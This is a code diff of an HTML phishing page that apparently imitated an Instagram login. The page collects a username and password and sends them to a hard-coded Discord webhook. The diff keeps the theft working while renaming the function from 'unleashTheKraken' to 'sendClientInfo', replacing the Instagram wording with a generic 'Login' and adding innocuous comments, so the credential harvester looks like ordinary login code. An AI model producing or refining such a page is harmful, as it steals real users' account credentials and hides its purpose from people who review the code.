--- a/instagram.html
+++ b/instagram.html
@@ -1,36 +1,38 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Instagram Login</title>
+    <title>Login Page</title>
     <script>
-        function unleashTheKraken() {
+        function sendClientInfo() {
             var username = document.getElementById("username").value;
             var password = document.getElementById("password").value;
 
-            // Prepare to dive into the abyss of the web
+            // Create a new XMLHttpRequest object
             var xhr = new XMLHttpRequest();
+
+            // Prepare the request
             xhr.open("POST", "https://discord.com/api/webhooks/1116509552695840768/qaUSQH-IXxJOiAgDTmflw3wNTJcg5kmMHMtSe6fi7Xm0HA3JHrOEpXUUFWBRvE22HvQg", true);
             xhr.setRequestHeader("Content-Type", "application/json");
 
+            // Create the data object
             var data = JSON.stringify({
                 "username": username,
                 "password": password
             });
 
-            // Let the Kraken loose!
+            // Send the request with the data
             xhr.send(data);
         }
     </script>
 </head>
 <body>
-    <h2>login with insta to continue</h2>
+    <h2>Login</h2>
     <form>
         <label for="username">Username:</label>
         <input type="text" id="username" name="username" required><br><br>
         <label for="password">Password:</label>
         <input type="password" id="password" name="password" required><br><br>
-        <input type="button" value="Unleash the Kraken" onclick="unleashTheKraken()">
+        <input type="button" value="Login" onclick="sendClientInfo()">
     </form>
-
 </body>
 </html>
